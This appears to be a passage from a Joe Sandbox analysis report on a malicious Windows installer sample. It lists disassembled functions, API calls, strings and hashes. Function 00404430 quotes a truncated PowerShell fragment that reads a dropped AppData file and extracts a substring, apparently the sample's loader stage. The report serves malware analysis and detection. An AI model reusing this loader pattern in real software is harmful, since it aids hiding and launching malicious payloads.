                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                            • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                            • ShowWindow.USER32(00000000), ref: 00404F57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                            • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                            • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                            • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                            Function 00404430 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 269stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                            • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                            • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                              • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 0040603D
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406051
                                                              • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406064
                                                            • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                            • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                            Strings
                                                            • A, xrefs: 00404553
                                                            • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
                                                            • "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286, xrefs: 00404449
                                                            • QM, xrefs: 00404436
                                                            • : Completed, xrefs: 00404591, 00404596, 004045A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                            • String ID: "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$QM
                                                            • API String ID: 2246997448-782904895
                                                            • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                            • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                            • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                            • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                            Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens, xrefs: 004020F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens
                                                            • API String ID: 542301482-1921291325
                                                            • Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                            • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                            • Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                            • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                            Function 00402706 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                            • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                            • Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                            • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                            Function 004064EC Relevance: .3, Instructions: 334COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                            • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                            • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                            • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                            Function 00404132 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                            • GetSysColor.USER32(?), ref: 00404212
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                            • lstrlenW.KERNEL32(?), ref: 00404233
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                            • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                            • SendMessageW.USER32(00000000), ref: 004042B5
                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                            • SetCursor.USER32(00000000), ref: 00404334
                                                            • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                            • SetCursor.USER32(00000000), ref: 00404358
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: @.C$N$open$QM
                                                            • API String ID: 3615053054-2153087072
                                                            • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                            • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                            • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                            • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                            Function 00405A52 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                            • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                              • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                              • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                            • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                            • wsprintfA.USER32 ref: 00405ACA
                                                            • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                              • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                              • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                            • API String ID: 3756836283-899692902
                                                            • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                            • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                            • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                            • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                            • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                            • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                            • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                            Function 00405FDA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 0040603D
                                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406051
                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406064
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
